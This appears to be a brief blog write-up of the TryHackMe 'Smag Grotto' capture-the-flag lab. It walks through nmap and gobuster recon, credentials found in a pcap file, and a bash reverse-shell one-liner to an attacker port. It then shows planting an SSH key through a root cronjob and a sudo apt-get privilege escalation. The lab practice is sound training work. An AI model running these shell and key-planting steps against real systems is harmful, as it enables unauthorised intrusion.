Apr 7
TryHackMe: Smag Grotto
Today we will take a look at TryHackMe: Smag Grotto. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.
Recon:
- Network scan
Command: sudo nmap -sS -sC -sV -oN nmap/initial 10.10.240.21
- Gobuster
Command: gobuster dir -u http://10.10.240.21 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64
We found an directory here
Let’s check
We see a file with the .pcap extension. Let’s download and analyze.
We found the host, username and password in the file. Let’s go to the directory and enter.
Enumeration
I first did a ping check on the page that opened. Then I got a reverse shell.
Command: bash -c ‘bash -i >& /dev/tcp/IP/4242 0>&1’
As soon as I entered, I looked at my first job cronjob. As you can see the cronjob is taking the jake’s backup SSH public key and add it to the authorised keys, if we create our own key and modify the backup file we can access the server
Command: ssh-keygen -f jake
Let’s change the backup file on the server
Command: echo ‘key.pub’ > file
Now let’s enter
Command: ssh jake@IP -i key
Privilege Escalation
Let’s list the commands allowed by the command Sudo -l. Let’s privilege escalation with apt-get.
And now we are the root
“If you have any questions or comments, please do not hesitate to write. Have a good days”
